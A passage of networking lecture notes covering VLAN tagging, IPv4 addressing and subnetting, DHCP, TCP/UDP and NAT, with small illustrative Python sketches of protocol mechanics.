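For 802.1q, the tag is 4 bytes inserted after the source MAC address: the Tag Protocol Identifier 0x8100 followed by 3 priority bits, 1 CFI/DEI bit, and the 12-bit VLAN ID. The minimal Python sketch below shows what a trunk port adds and what the egress access port removes. It covers 802.1q only (Cisco ISL encapsulates the whole frame with its own header instead), the function names are hypothetical, and the frame is assumed to exclude the FCS, which a real switch must recompute.

```python
import struct
from typing import Optional

TPID_8021Q = 0x8100  # Tag Protocol Identifier for 802.1q tagged frames


def add_dot1q_tag(frame: bytes, vlan_id: int, priority: int = 0) -> bytes:
    """Insert a 4-byte 802.1q tag after destination and source MAC (first 12 bytes)."""
    if not 0 <= vlan_id <= 0xFFF:
        raise ValueError("VLAN ID must fit into 12 bits")
    if not 0 <= priority <= 7:
        raise ValueError("priority must fit into 3 bits")
    tci = (priority << 13) | vlan_id  # PCP (3 bits) | CFI/DEI (1 bit, 0) | VID (12 bits)
    return frame[:12] + struct.pack("!HH", TPID_8021Q, tci) + frame[12:]


def vlan_of(frame: bytes) -> Optional[int]:
    """Return the VLAN ID of a tagged frame, or None for an untagged frame."""
    (tpid,) = struct.unpack_from("!H", frame, 12)
    if tpid != TPID_8021Q:
        return None
    (tci,) = struct.unpack_from("!H", frame, 14)
    return tci & 0x0FFF


def strip_dot1q_tag(frame: bytes) -> bytes:
    """Remove the tag again, as the egress switch does on an access port."""
    return frame[:12] + frame[16:] if vlan_of(frame) is not None else frame


untagged = bytes(12) + b"\x08\x00" + bytes(46)  # dummy MACs, IPv4 type, padding
tagged = add_dot1q_tag(untagged, vlan_id=10, priority=5)
print(vlan_of(tagged), len(tagged) - len(untagged))  # 10 4
```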
VLAN Trunking Example
Inter-VLAN communication not possible
Packets across the VLAN trunk are tagged
Either using 802.1q or ISL tag
Broadcast storms
Endless cycling
TCN mechanism
RSTP
MSTP
19 {C} Herbert Haas 2005/03/11 http://www.perihel.at
Note: STP is a port-based algorithm
Only the root-bridge election is done on the bridge level
All other processing is port-based
Cisco patent
Few seconds
Better scalability
Default mode
Instance 0
Frame Bursting
Carrier Extension
No GE hubs available on the market today: forget it!
No CSMA/CD defined for 10GE (!)
Remember: Hubs simulate a half-duplex coaxial cable inside, hence limiting
the total network diameter. For Gigabit Ethernet this limitation would be about
25 meters, which is rather impractical for professional usage. Although
some countermeasures had been specified in the standard, such as frame
bursting and carrier extension, no vendor has developed a GE hub as of today.
Thus: Forget GE hubs!
The original 10 GE specification (IEEE 802.3ae) considers neither copper
connections nor hubs; it runs over fiber only. Copper variants (10GBASE-CX4,
10GBASE-T) were specified later, but still without hubs or CSMA/CD.
At this point, remember the initial idea in the mid-1970s: bus,
CSMA/CD, short distances, no network nodes.
Today: structured cabling (point-to-point or star), never CSMA/CD, WAN
capabilities, sophisticated switching devices in between.
MAC Control Frames
Additional functionality easily integrated
Radiation/EMI
Grounding problems
High BER
Collision free
WAN qualified
Switched
Several coding styles
Complex PHY architecture
Plug & play through autonegotiation
Much simpler than ATM, but no B-ISDN solution (might change!)
Quiz
Why does high-speed Ethernet tend toward a synchronous PHY?
Can I attach a 100 Mbit/s port to a 1000 Mbit/s port via fiber?
What is the idea of EtherChannels?
(Maximum bit rate, difference to multiple parallel links)
Q1: On fiber it is difficult to deal with asynchronous transmission; photons
cannot be buffered easily, which leads to store-and-forward problems.
Q2: No, autonegotiation on fiber does not negotiate data rates.
Q3: "Normal" parallel links would be disabled by STP; EtherChannel bundles
up to 8 links into one logical link.
The Internet Protocol (IP)
The Blood of the Internet
"Information Superhighway is really an
acronym for 'Interactive Network For
Organizing, Retrieving, Manipulating,
Accessing And Transferring Information
On National Systems, Unleashing Practically
Every Rebellious Human
Intelligence, Gratifying Hackers, Wiseacres,
And Yahoos'."
Keven Kwaku
The Internet Protocol (IP)
Introduction
IP Addressing
IP Header
IP Address Format
Address Classes
Class A - E
Subnetting, VLSM
IP Fragmentation
In this chapter we talk about the Internet Protocol (IP), especially about IP
version 4. IPv4 was standardized in September 1981 in RFC 791.
IP is a packet-switching technology on OSI layer 3. IP is connectionless and an
overlay technique. In this module we discuss fundamental questions around the IP
protocol, such as: What other (helper) protocols are necessary? What is an IP
address? What is subnetting and VLSM?
Need of an Inter-Net Protocol (1)
Different Data-Link Layer
Different frames
Different protocol handling
Different Physical Layer
Different hardware
Different signals
No interconnection possible!!!
Figure: three separate networks, each with Host 1, Host 2, and Host 3
Why do we need an Inter-Net Protocol? Different networks have different data
link layers. Every network runs a different protocol. Some networks use
proprietary link layer protocols or X.25; other networks use Ethernet or HDLC.
As you see, every network has its own hardware, signals, and frames. As long as
they do not want to communicate with each other, there is no problem...
Need of an Inter-Net Protocol (2)
Figure: Network 1, Network 2, and Network 3
Common internetworking layer
Connectionless
Layer 4
End-to-end control is implemented in the upper layers of the IP host, by
TCP (Transmission Control Protocol, a layer 4 protocol).
TCP is a connection-oriented protocol. It takes care of flow control,
sequencing, windowing, and error recovery.
IP Introduction (4)
IP over anything: Overlay Technique
Connection oriented
Error recovery
Flow control
Sequencing
IP is the router's language
A (1-127)
B (128-191)
C (192-223)
D (224-239, Multicast)
E (240-254, Experimental)
Classes define number of address bits for net-id
In the beginning of the Internet, five address classes were defined. Classes A,
B, and C were created to provide different network address ranges.
Additionally, Class D is the range of IP multicast addresses, that is, addresses
that have no topological structure. Finally, class E was reserved for research
experiments and is not used in the Internet.
The idea of classes helps a router to decide how many bits of a given IP address
identify a network number and how many bits are therefore available for host
numbering. The usage of classes has a long tradition in the Internet and was a
main reason for IP address depletion.
The first byte (or "octet") of an IP address identifies the class. For example, the
address 205.176.253.5 is a class C address.
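Because the class is encoded in the leading bits of the first octet (0xxx = A, 10xx = B, 110x = C, 1110 = D, 1111 = E), a router can determine it with a few bit tests. A minimal Python sketch with a hypothetical function name; note that it treats the whole first-octet range 0-127 as class A, although networks 0 and 127 are reserved.

```python
def address_class(address: str) -> str:
    """Return the classful category (A-E) of a dotted-quad IPv4 address."""
    first_octet = int(address.split(".")[0])
    if not 0 <= first_octet <= 255:
        raise ValueError("invalid first octet")
    if (first_octet & 0x80) == 0:     # 0xxxxxxx
        return "A"
    if (first_octet & 0xC0) == 0x80:  # 10xxxxxx
        return "B"
    if (first_octet & 0xE0) == 0xC0:  # 110xxxxx
        return "C"
    if (first_octet & 0xF0) == 0xE0:  # 1110xxxx, multicast
        return "D"
    return "E"                        # 1111xxxx, experimental


print(address_class("205.176.253.5"))  # C
```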
Broadcasts and Networks
All ones in the host part represents the "network broadcast" (10.255.255.255)
All ones in the net part and host part represents the "limited broadcast in this network" (255.255.255.255)
All zeros in the host part represents the "network address" (10.0.0.0)
A network broadcast is used to send a broadcast packet to a dedicated network.
The IETF strongly discourages the use of network broadcasts, and they are not
defined for IPv6.
If a destination IP address consists of "all 1s", which can be represented in
dotted decimal notation as "255.255.255.255", then this is recognized as a "local"
or "limited" broadcast. A limited broadcast is never forwarded by routers; otherwise
the whole Internet would be congested by "broadcast storms". Note that
broadcast addresses must not be used as source addresses.
A network is described using the "network address", which is simply its IP
address with the host part set to zero. Network addresses are used in routing entries
and routing protocols, since a router only deals with networks and does not care
about host addresses.
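Python's standard `ipaddress` module can derive both special addresses of a network directly: the network address (host part all zeros) and the network broadcast (host part all ones). This sketch assumes the classful prefix lengths, i.e. /8 for network 10.0.0.0 and /24 for a class C network; the helper name is hypothetical.

```python
import ipaddress

LIMITED_BROADCAST = ipaddress.IPv4Address("255.255.255.255")  # never forwarded by routers


def network_and_broadcast(prefix: str) -> tuple:
    """Return (network address, network broadcast) as strings for a prefix."""
    net = ipaddress.ip_network(prefix)
    return str(net.network_address), str(net.broadcast_address)


print(network_and_broadcast("10.0.0.0/8"))      # ('10.0.0.0', '10.255.255.255')
print(network_and_broadcast("192.168.1.0/24"))  # ('192.168.1.0', '192.168.1.255')
```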
Reserved Addresses
Address range for private use
10.0.0.0 - 10.255.255.255
172.16.0.0 - 172.31.255.255
192.168.0.0 - 192.168.255.255
RFC 1918
Network 127.x.x.x is reserved for
"Loopback"
So-called RFC 1918 addresses are class A, B, and C address blocks which can
be used for internal purposes. Such addresses must not be used in the Internet.
All gateways connected to the Internet should filter packets that contain these
private addresses. Furthermore, these addresses must not be used in Internet
routing updates.
Because of these rigid filter policies, it is relatively safe to use RFC 1918
addresses in local networks: everybody in the Internet knows which addresses
must be filtered.
Each operating system provides a virtual IP interface, called the loopback
interface. By default the IP addresses 127.x.x.x are reserved for this purpose.
Initially, the idea came from the UNIX world, as IP is only one of several means
to achieve inter-process communication on a UNIX workstation. Other
methods are, for example, named/unnamed pipes, shared memory, or message
queues.
When using IP for inter-process communication, the involved client/server
processes can be distributed across different servers in a network, without
any modification of the source code!
By default, a modern operating system assigns the IP address 127.0.0.1 to the
local loopback interface.
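The filtering rule described above can be sketched with Python's `ipaddress` module by testing membership in the three RFC 1918 blocks (172.16.0.0 - 172.31.255.255 is the /12 prefix) and the loopback network. The filter function is a hypothetical illustration of an Internet edge policy, not a complete ingress filter.

```python
import ipaddress

# The three private blocks of RFC 1918 and the loopback network.
RFC1918_BLOCKS = [
    ipaddress.ip_network("10.0.0.0/8"),      # 10.0.0.0 - 10.255.255.255
    ipaddress.ip_network("172.16.0.0/12"),   # 172.16.0.0 - 172.31.255.255
    ipaddress.ip_network("192.168.0.0/16"),  # 192.168.0.0 - 192.168.255.255
]
LOOPBACK = ipaddress.ip_network("127.0.0.0/8")


def is_rfc1918(address: str) -> bool:
    """True if the address lies in one of the private RFC 1918 blocks."""
    ip = ipaddress.ip_address(address)
    return any(ip in block for block in RFC1918_BLOCKS)


def should_filter_at_internet_edge(source: str) -> bool:
    """Hypothetical edge filter: drop packets with private or loopback sources."""
    return is_rfc1918(source) or ipaddress.ip_address(source) in LOOPBACK


print(is_rfc1918("172.31.255.255"), is_rfc1918("172.32.0.1"))  # True False
```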
Addressing Example
Figure: routers with Ethernet (E0, E1) and serial (S0, S1) interfaces connecting the networks 10.0.0.0, 172.16.0.0, 172.20.0.0, 192.168.1.0, 192.168.2.0, 192.168.3.0, and 192.168.4.0; hosts and router interfaces are numbered from these networks (e.g. 10.0.0.1, 10.0.0.254, 192.168.2.1)
Classful Address Waste
Two-level hierarchy was sufficient in the early days of the Internet
The growing sizes of LANs demanded a third hierarchical level
"Subnetting" allows some bits of the host-ID to be interpreted as "Subnet"
Network Number Statistics, April 1992 (Source: RFC 1335)
Class      Total      Allocated   Allocated %
Class A    126        48          54%
Class B    16383      7006        43%
Class C    2097151    40724       2%
The "classful" method of identifying the network ID of a given IP address is
inflexible and led to address space depletion. The table above shows how the
total address space had been allocated by April 1992, according to RFC 1335.
Note that only 2 percent of the more than 2 million Class C network numbers
had been assigned. Class C networks are too small for most organizations, but
class A and B are too large. Of course many companies tried to grab a class A
network number because of the huge address space: they would never need
another IP network number again.
LANs were getting bigger and bigger, and a logical separation of an organization's
network (e.g. of a class A network number) would be a great help. Until then,
multiple network numbers had been assigned to single companies, which caused
two problems: waste of IP address space and growing Internet routing tables.
As early as 1985, RFC 950 defined a standard procedure to support subnetting of a
single Class A, B, or C network number into smaller pieces. Thus organizations
can deploy additional subnets without needing to obtain a new network number
from the Internet.
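The size mismatch between the classes, and how subnetting fixes it, can be illustrated with a short Python sketch. It counts usable hosts per classful network (all-zeros and all-ones host parts excluded) and splits one class B network number into 256 subnets using the standard `ipaddress` module. The helper names are hypothetical, and the sketch lists every subnet, including subnet zero and the all-ones subnet, whose use RFC 950 originally discouraged.

```python
import ipaddress


def classful_hosts(host_bits: int) -> int:
    """Usable host addresses: all-zeros (network) and all-ones (broadcast) excluded."""
    return 2 ** host_bits - 2


def subnet(prefix: str, new_prefix: int) -> list:
    """Split one network number into equally sized subnets."""
    return list(ipaddress.ip_network(prefix).subnets(new_prefix=new_prefix))


for cls, bits in (("A", 24), ("B", 16), ("C", 8)):
    print(f"Class {cls}: {classful_hosts(bits)} hosts per network")

subnets = subnet("172.16.0.0/16", 24)
print(len(subnets), subnets[0], subnets[-1])  # 256 172.16.0.0/24 172.16.255.0/24
```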
Subnet Zero / Subnet Broadcast
Consider network 10.0.0.0
Classes A, B, C
IP Routing Basics
BOOTP
DHCP
Proxy ARP
Address Resolution {ARP, RARP, Proxy ARP}
"The ARP Hack"
Proxy ARP (1)
Routers connect only networks with different net-IDs
Routers with Proxy ARP enabled also connect networks with the same net-ID
Implementation differences!
Simple Operation
Any station (host or router) detecting transmission problems sends an ICMP
error message back to the originator
ICMP gives feedback
ICMP messages are carried within IP packets
Protocol field = 1
Figure: ICMP message to 1.0.0.1: "host unreachable"
Rules
The interface on which the packet comes into the router is the same interface on
which the packet gets routed out
The subnet/network of the source IP address is the same as the subnet/network of
the next-hop IP address of the routed packet
The datagram is not source-routed
The kernel is configured to send redirects
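The four redirect conditions combine with a logical AND. The minimal Python sketch below encodes them, assuming the router knows the subnet configured on the interface in question; the `RoutingDecision` record and all names are hypothetical and do not correspond to any particular kernel implementation.

```python
import ipaddress
from dataclasses import dataclass


@dataclass
class RoutingDecision:
    in_interface: str    # interface the packet arrived on
    out_interface: str   # interface chosen by the routing table
    source: str          # source IP address of the packet
    next_hop: str        # next-hop IP address chosen by the router
    source_routed: bool  # True if the datagram carries a source-route option


def should_send_redirect(d: RoutingDecision, interface_subnet: str,
                         redirects_enabled: bool = True) -> bool:
    """Return True only if all four redirect rules hold."""
    subnet = ipaddress.ip_network(interface_subnet)
    return (
        d.in_interface == d.out_interface              # same interface in and out
        and ipaddress.ip_address(d.source) in subnet   # source on that subnet ...
        and ipaddress.ip_address(d.next_hop) in subnet # ... as is the next hop
        and not d.source_routed
        and redirects_enabled                          # configured to send redirects
    )


d = RoutingDecision("eth0", "eth0", "10.0.0.5", "10.0.0.254", False)
print(should_send_redirect(d, "10.0.0.0/24"))  # True
```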
Summary
On Layer 3, IP addresses are used to route packets
Message Type
Hardware Address Type (HTYPE)
Hardware Address Length (HLEN)
Hops
Increased/checked by routers
The Hops field is important to avoid broadcast loops in a network. Every time a
BOOTP packet is forwarded by a router, the router increments the hops field by 1.
Operation Code (OP)
1 = Boot request
2 = Boot reply
Hardware Address Type (HTYPE)
Network type (1 = Ethernet 10 Mbit/s)
Hardware Address Length (HLEN)
6 = Ethernet
BootP - Message Fields
Transaction ID
MAC address of client
The "Server IP address" field contains the IP address of an optional boot server.
If a gateway does decide to forward the request, it should look at the 'giaddr'
(gateway IP address) field. If it is zero, the gateway should plug its own IP address
(on the receiving cable) into this field. It may also use the 'hops' field to optionally
control how far the packet is reforwarded. Hops should be incremented on each
forwarding. For example, if hops passes '3', the packet should probably be
discarded.
The client's HW address is needed to find an entry in the address table at the
BOOTP server.
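The gateway (relay) behavior just described can be sketched in a few lines of Python. This is a minimal illustration, assuming the example threshold of 3 hops from the text; the `BootpRequest` record holds only the fields involved, and all names are hypothetical.

```python
from dataclasses import dataclass, replace
from typing import Optional

MAX_HOPS = 3  # example threshold taken from the text ("if hops passes 3")


@dataclass(frozen=True)
class BootpRequest:
    giaddr: str  # gateway IP address field, "0.0.0.0" if not yet set
    hops: int    # number of relaying gateways passed so far
    chaddr: str  # client hardware (MAC) address, used by the server's table lookup


def relay_request(req: BootpRequest, receiving_ip: str) -> Optional[BootpRequest]:
    """Forward decision of a gateway: count hops, fill giaddr, drop on too many hops."""
    hops = req.hops + 1
    if hops > MAX_HOPS:
        return None  # discard the request
    giaddr = receiving_ip if req.giaddr == "0.0.0.0" else req.giaddr
    return replace(req, giaddr=giaddr, hops=hops)


print(relay_request(BootpRequest("0.0.0.0", 0, "MAC A"), "10.1.0.1"))
```

Only the first gateway fills in giaddr, so the server always knows the network the client is attached to and can reply via that gateway.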
BootP - Message Fields
Server Host Name
More parameters
Uses UDP communication
Client-Side: Port 68
Server-Side: Port 67
Based on a leasing idea!
Dynamic configuration
RFC 2131 and RFC 2132
The Dynamic Host Configuration Protocol works nearly identically to BOOTP.
DHCP uses the same message format with only slight changes.
DHCP is based on a leasing idea: the IP address is leased from the server to
the client for a certain time, and the client has to send its request again
(renew the lease) before this time expires.
Flexible Configurations
Automatic: Host gets permanent address
Dynamic: Address has expiration date/time (leasing)!
Manual: Fixed mapping MAC -> IP
The slide above shows the three different kinds of configuration methods.
BOOTP uses a manual configuration, a fixed mapping (MAC -> IP). DHCP also
supports dynamic configuration: the IP address offered by the server expires
after a certain time (leasing idea).
Parameters
IP address
Subnet mask
DNS Server
NetBIOS Name Server
List of default gateways
Ethernet EncapsuIation
Router Discovery (RFC 1256)
Path MTU Discovery (RFC 1191)
etc...
This slide shows some configuration parameters which can be sent with DHCP.
It is also possible to transfer information about the maximum datagram reassembly
size, ARP cache timeout, TCP keepalive, default TTL, source routing options, and MTU.
How Does It Work - 1
Figure: DHCP Client, DHCP Server 1, DHCP Server 2
1. IP LEASE REQUEST [DHCPDISCOVER]: "Here is MAC A. I need an IP Address!"
2. IP LEASE OFFER [DHCPOFFER]
The slide above shows the basic principle of DHCP. In a bigger
network there may be more than one DHCP server. The DHCP client connects to
the network and starts sending an IP LEASE REQUEST [DHCPDISCOVER]
(via broadcast, like BOOTP). Every DHCP server in the network receives this
message. Every DHCP server has its own address pool. If a server has addresses
left in its pool, it sends back an IP LEASE OFFER [DHCPOFFER] (this
offer contains the IP address for the client) to the client.
How Does It Work - 1 (DETAILED)
Figure: DHCP client (MAC A) and DHCP servers 10.1.0.10 and 10.1.0.20; offered address 10.1.0.99
1. DHCPDISCOVER
Source IP Address: 0.0.0.0
Dest. IP Address: 255.255.255.255
HW Address: MAC A
2. DHCPOFFER
Source IP Address: 10.1.0.20
Dest. IP Address: 255.255.255.255
Offered IP Address: 10.1.0.99
Client HW Address: MAC A
Subnet mask: 255.255.255.0
Lease length: 48h
Server ID: 10.1.0.20
This picture shows the same as the last one, but in more detail. The client sends
out its DHCPDISCOVER message and both servers receive it. Then server
10.1.0.20 sends back its DHCPOFFER. This offer contains the IP address for
the client (Offered IP Address), the subnet mask, the server ID, and the lease length.
How Does It Work - 2
Figure: DHCP Client, DHCP Server 1, DHCP Server 2
3. IP LEASE SELECTION [DHCPREQUEST]: "Thank you server 2 for the IP Address! Listen everybody: I use the information from this server, stop offering!"
4. IP LEASE ACKNOWLEDGMENT [DHCPACK]
After the client gets an offer from one server, it sends out an IP LEASE
SELECTION [DHCPREQUEST] to tell the other servers that it will accept the
offer from server 2 and that the other servers can stop sending offers. The
DHCPREQUEST is also a broadcast.
How Does It Work - 2 (DETAILED)
Figure: DHCP client (MAC A, leased address 10.1.0.99) and DHCP servers 10.1.0.10 and 10.1.0.20
3. DHCPREQUEST
Source IP Address: 0.0.0.0
Dest. IP Address: 255.255.255.255
HW Address: MAC A
Req. IP Address: 10.1.0.99
Server ID: 10.1.0.20
4. DHCPACK
Source IP Address: 10.1.0.20
Dest. IP Address: 255.255.255.255
Offered IP Address: 10.1.0.99
Client HW Address: MAC A
Subnet mask: 255.255.255.0
Lease length: 48h
Server ID: 10.1.0.20
One important element is the server ID in the DHCPREQUEST. This server ID tells
the server from which the client gets its IP address that the client will take this
offered address. After server 2 receives the DHCPREQUEST, it sends back the
DHCPACK to acknowledge this lease.
Bound
DHCPACK (success) is sent by the server whose offer was accepted
Client receives the DHCPACK
Client enters the BOUND state
TCP/IP is completely initialized
After the client receives the DHCPACK (if all was successful), it enters the
BOUND state. Once the client is BOUND, TCP/IP is completely initialized and the
client is ready for data transfer.
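The whole DISCOVER, OFFER, REQUEST, ACK exchange can be simulated in a few lines of Python. This is a minimal sketch under simplifying assumptions: no real packets are sent, the list order of the servers stands for the order in which offers arrive, the client always takes the first offer, and all class and function names are hypothetical. The addresses reproduce the example above, where only server 10.1.0.20 has a free address.

```python
from dataclasses import dataclass, field
from typing import Dict, List, Optional


@dataclass
class Offer:
    server_id: str
    offered_ip: str
    lease_hours: int


@dataclass
class DhcpServer:
    server_id: str
    pool: List[str]
    pending: Dict[str, str] = field(default_factory=dict)  # MAC -> offered IP
    bound: Dict[str, str] = field(default_factory=dict)    # MAC -> leased IP

    def on_discover(self, mac: str) -> Optional[Offer]:
        """DHCPDISCOVER: offer an address if the pool is not empty."""
        if not self.pool:
            return None
        ip = self.pool.pop(0)
        self.pending[mac] = ip
        return Offer(self.server_id, ip, lease_hours=48)

    def on_request(self, mac: str, server_id: str) -> Optional[str]:
        """DHCPREQUEST (broadcast): ACK if selected, otherwise withdraw the offer."""
        ip = self.pending.pop(mac, None)
        if ip is None:
            return None
        if server_id == self.server_id:
            self.bound[mac] = ip
            return ip  # DHCPACK
        self.pool.insert(0, ip)  # not selected: address goes back to the pool
        return None


def dora(mac: str, servers: List[DhcpServer]) -> Optional[str]:
    """Run DISCOVER, OFFER, REQUEST, ACK; the client takes the first offer."""
    offers = [offer for s in servers if (offer := s.on_discover(mac)) is not None]
    if not offers:
        return None
    chosen = offers[0]
    acked = None
    for s in servers:  # the DHCPREQUEST is a broadcast, so every server sees it
        result = s.on_request(mac, chosen.server_id)
        if result is not None:
            acked = result
    return acked  # the client enters the BOUND state when this is not None


servers = [DhcpServer("10.1.0.10", []), DhcpServer("10.1.0.20", ["10.1.0.99"])]
print(dora("MAC A", servers))  # 10.1.0.99
```

Carrying the server ID in the broadcast DHCPREQUEST lets the servers that were not chosen return their offered addresses to the pool.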
DHCPNACK
DHCPNACK (no success) will be
sent if
Response to a DHCPDISCOVER
Offering an IP address
DHCPREQUEST
Lease Time
T1 (renewal attempt)
Flow control
RFC 793
In this chapter we talk about TCP. TCP is a connection-oriented layer 4 protocol
and only works between the hosts. It synchronizes (connects) the hosts with each
other via the '3-Way-Handshake' before the real transmission begins. After this,
a reliable end-to-end transmission is established. TCP was standardized in
September 1981 in RFC 793. (Remember: IP was standardized in September
1981 too, in RFC 791.) TCP is always used with IP, and it also protects parts of the IP
packet: its checksum covers the whole TCP segment plus a pseudo-header containing
the IP source and destination addresses, so it spans (almost) the whole IP packet.
TCP provides error recovery, flow control and sequencing. The most important
thing with TCP is the port number, which we will discuss later.
TCP Facts (2)
Application's data is regarded as
a continuous byte stream
TCP ensures a reliable transmission
of segments of this byte stream
Handover to Layer 7 at "Ports"
Controlled by IANA
Client processes use arbitrary port
numbers >1023
1433 Microsoft-SQL-Server
1527 Oracle
Multiple of 4 bytes
Often ignored
PSH-Flag: 1 bit. Control bit.
A TCP instance can decide on its own when to send data to the next instance.
One strategy could be to collect data in a buffer and forward the data when the
buffer exceeds a certain size. To provide a low-latency connection, the PSH flag is
sometimes set to 1. Then TCP should push the segment immediately to the
application without buffering. But typically the PSH flag is ignored.
TCP Header (5)
SYN-Flag
"Delayed Acknowledgements"
....
Additionally, there are different implementations
(Reno, Vegas, ...)
'Slow Start' and 'Congestion Avoidance' are mechanisms that control the
segment rate (per RTT).
'Fast Retransmit' and 'Fast Recovery' are mechanisms to avoid waiting for the
timeout in case of retransmission, and to avoid slow start after a fast
retransmission.
Delayed Acknowledgements are typically used with applications like Telnet: here
each client keystroke triggers a single packet with a one-byte payload, and the server
must respond with both an echo and a TCP acknowledgement. Note that this
server echo must also be acknowledged by the client. Therefore layer 4 delays
the acknowledgements, because layer 7 might want to send some bytes as well;
the acknowledgement can then travel in the same segment.
The Nagle algorithm tries to make WAN connections more efficient. We simply
delay the transmission of small segments while earlier data is still unacknowledged,
in order to collect more bytes from layer 7.
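A minimal Python sketch of the Nagle decision as it is commonly described (RFC 896): a full-sized segment may always be sent, a small one only when no earlier data is unacknowledged. The function names and the typing model are illustrative assumptions: each keystroke is one byte, and every segment is acknowledged exactly one RTT later.

```python
def nagle_may_send(pending_bytes: int, unacked_bytes: int, mss: int) -> bool:
    """Nagle rule: a full-sized segment may always go out; a small one
    only when no previously sent data is still unacknowledged."""
    if pending_bytes == 0:
        return False
    if pending_bytes >= mss:
        return True
    return unacked_bytes == 0

def simulate_typing(keys_per_rtt: int, rtts: int, mss: int = 1460) -> int:
    """Count the segments sent while a user types steadily. Simplifying
    assumptions: one keystroke = one byte, every segment is ACKed one RTT later."""
    segments = buffered = in_flight = 0
    for _ in range(rtts):
        in_flight = 0                      # the ACK for earlier data arrives
        if nagle_may_send(buffered, in_flight, mss):
            segments, in_flight, buffered = segments + 1, in_flight + buffered, 0
        for _ in range(keys_per_rtt):
            buffered += 1                  # next keystroke from layer 7
            if nagle_may_send(buffered, in_flight, mss):
                segments, in_flight, buffered = segments + 1, in_flight + buffered, 0
    return segments
```

With ten keystrokes per RTT over three RTTs, `simulate_typing(10, 3)` sends 3 segments instead of 30; the bytes typed during the last RTT are still waiting in the buffer when the simulation stops.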
Selective Acks enhance the traditional positive-ack mechanism and allow the receiver
to selectively acknowledge correctly received segments within a larger block that
contains lost or corrupted segments.
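Window Scaling deals with the problem of a window that is too small when the RTT-
bandwidth product is greater than 65535 bytes (the classical maximum window size):
the sender would have to stop and wait for acknowledgements although the path is not
full. This TCP option allows the window value to be left-shifted (each bit shift is like
a multiplication by two).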
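The arithmetic behind window scaling can be sketched in Python: compute the bandwidth-delay product and find the smallest shift count so that 65535 shifted left by it covers that product. The helper names are hypothetical; the maximum shift count of 14 comes from the TCP window scale option specification (RFC 7323).

```python
import math

MAX_WINDOW_FIELD = 65_535   # largest value of the 16-bit window field
MAX_SHIFT = 14              # largest shift count allowed for the window scale option

def bdp_bytes(bandwidth_bps: float, rtt_s: float) -> int:
    """Bandwidth-delay product: bytes that must be in flight to fill the path."""
    return math.ceil(bandwidth_bps * rtt_s / 8)

def required_shift(bdp: int) -> int:
    """Smallest shift s with (65535 << s) >= bdp."""
    shift = 0
    while (MAX_WINDOW_FIELD << shift) < bdp:
        shift += 1
    if shift > MAX_SHIFT:
        raise ValueError("window cannot be scaled that far")
    return shift

def effective_window(window_field: int, shift: int) -> int:
    """Window actually granted: the 16-bit field shifted left (x2 per bit)."""
    return window_field << shift
```

For an assumed 100 Mbit/s path with 100 ms RTT the BDP is 1,250,000 bytes, which needs a shift of 5 (65535 << 5 = 2,097,120 bytes).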
TCP Disconnect
A TCP session is disconnected similarly
to the three-way handshake
The FIN flag marks the sequence number to be
the last one; the other station acknowledges and
terminates the connection in this direction
The exchange of FIN and ACK flags ensures that
both parties have received all octets
The RST flag can be used if an error occurs
during the disconnect phase
UDP
UDP is a connectionless layer 4 service
(datagram service)
Layer 3 functions are extended by port
addressing and a checksum to ensure integrity
UDP uses the same port numbers as TCP
(if applicable)
UDP is used where the overhead of a connection-oriented
service is undesirable or where the
implementation has to be small
DNS request/reply, SNMP get/set, booting by TFTP
Less complex than TCP, easier to implement
UDP is connectionless and supports no error recovery or flow control. Therefore
a UDP stack is extremely lightweight compared to TCP.
Typically, applications that do not require error recovery but rely on speed use
UDP, such as multimedia protocols.
UDP Header
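0                 16                32  (bit)
+-----------------+-----------------+
| Source Port     | Destination Port|
+-----------------+-----------------+
| UDP Length      | UDP Checksum    |
+-----------------+-----------------+
| PAYLOAD                           |
+-----------------------------------+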
The picture above shows the 8-byte UDP header. Note that the checksum is often
not calculated (over IPv4 a checksum value of 0 means "no checksum"), so UDP
basically carries only the port numbers.
I personally think that the length field is just for fun (or to align with 4 octets).
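To make the 8-byte layout concrete, here is a small Python sketch using the standard `struct` module. `build_udp` and `parse_udp` are hypothetical helpers; the checksum is left at 0 ("not computed"), which is only permitted over IPv4, and the real checksum over the IP pseudo-header is not implemented.

```python
import struct

# Source port, destination port, length, checksum: four unsigned 16-bit
# fields in network byte order (big-endian).
UDP_HEADER = struct.Struct("!HHHH")

def build_udp(src_port: int, dst_port: int, payload: bytes, checksum: int = 0) -> bytes:
    """Prepend the 8-byte UDP header; checksum 0 means "not computed" (IPv4 only)."""
    length = UDP_HEADER.size + len(payload)      # the length covers header + data
    return UDP_HEADER.pack(src_port, dst_port, length, checksum) + payload

def parse_udp(datagram: bytes) -> dict:
    """Split a datagram into its header fields and payload."""
    src_port, dst_port, length, checksum = UDP_HEADER.unpack_from(datagram)
    return {"src_port": src_port, "dst_port": dst_port, "length": length,
            "checksum": checksum, "payload": datagram[UDP_HEADER.size:length]}
```

`build_udp(1034, 53, b"query")` yields a 13-byte datagram: 8 header bytes plus 5 payload bytes, and the length field carries 13.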
UDP
Source and Destination Port
Reflects origin
Since these terms are so important, and many people and some documents
confuse them, we give a summary here.
Note that local addresses have local meaning. That is: inside devices can only
deal with packets having local addresses. The NAT router is responsible for
translating global addresses to local ones and vice versa, if necessary! (If you later
understand the last two words, originally written in italics, then you got it.)
Note that outside does not mean another (foreign) NAT domain. Outside
simply means the Internet, or everything beyond the NAT router.
Terms Summary
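[Figure: Inside Network | NAT | Outside Network]
Inside to outside: SA = Inside Local, DA = Outside Local (inside network); after NAT: SA = Inside Global, DA = Outside Global (outside network)
Outside to inside: SA = Outside Global, DA = Inside Global (outside network); after NAT: SA = Outside Local, DA = Inside Local (inside network)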
This slide summarizes all terms by showing packets flowing from inside to
outside and from outside to inside. Local is what we can use inside our
network. Inside local source addresses are normally private addresses, otherwise
we would not need NAT.
Outside local addresses can be either private or registered. Mostly they are
registered, but in certain cases we might want to present officially registered
addresses in incoming packets as private addresses. See the slide
"Outside Address Translation" for this special case. Typically the outside local
address is identical to the outside global address.
The inside global address is the official address of our hosts as seen in the
Internet. What people mostly expect from NAT is to translate an inside local
address to an inside global address. Both addresses belong to a host inside our
network.
The outside global address is the officially registered IP address of an Internet
host. Mostly it is identical to the outside local address we use as destination
address for outgoing packets. See the slide "Outside Address Translation" for
exceptions.
Basic Principle (1a)
[Figure: inside hosts 10.1.1.1 and 10.1.1.2, NAT router (outside interface 193.9.9.99), outside host 198.5.5.55]
Simple NAT Table:
Inside Local IP    Inside Global IP
10.1.1.1           193.9.9.1
10.1.1.2           193.9.9.2
....               ....
1) Suppose the user at host 10.1.1.1 opens a connection to host 198.5.5.55.
2) The first packet that the router receives from host 10.1.1.1 causes the router
to check its NAT table.
3) The router replaces the source address with the inside global address found
